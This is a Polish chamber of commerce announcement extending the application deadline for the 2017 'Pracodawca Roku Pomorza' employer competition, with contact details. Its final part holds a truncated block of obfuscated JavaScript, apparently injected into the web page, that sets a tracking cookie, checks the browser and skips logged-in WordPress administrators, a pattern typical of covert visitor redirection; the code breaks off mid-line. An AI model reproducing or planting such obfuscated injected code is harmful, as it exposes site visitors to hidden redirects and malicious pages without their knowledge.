Przedłużenie przyjmowania zgłoszeń do Konkursu Pracodawca Roku Pomorza | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo, Drodzy Przedsiębiorcy!

Dziękujemy wszystkim Firmom, które już się zgłosiły do udziału w Konkursie Pracodawca Roku Pomorza 2017. Cieszymy się, że nasza inicjatywa spotkała się z takim zainteresowaniem!

Mamy bardzo dobrą wiadomość! Biorąc pod uwagę m.in. duże zainteresowanie ze strony firm, sezon wakacyjny oraz prośby przedsiębiorców o przedłużenie terminu przyjmowania wniosków, Rada Oddziału Północnej Izby w Koszalinie podjęła decyzję o przedłużeniu terminu składania ankiet do 25 sierpnia 2017 (piątek).

Członków PIG zachęcam nie tylko do zgłaszania swojego udziału w konkursie, jak i do rekomendacji firm które Waszym zdaniem powinny zostać nagrodzone i wyróżnione.

Zgłoszenia przyjmuje Pani Dominika Wiśniewska z Biura Izby na adres e-mail: koszalin@izba.info. W przypadku dodatkowych pytań lub wątpliwości proszę o kontakt z Panią Dominiką pod nr telefonu 94-341-10-83 lub tel. kom. 733-837-300. 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m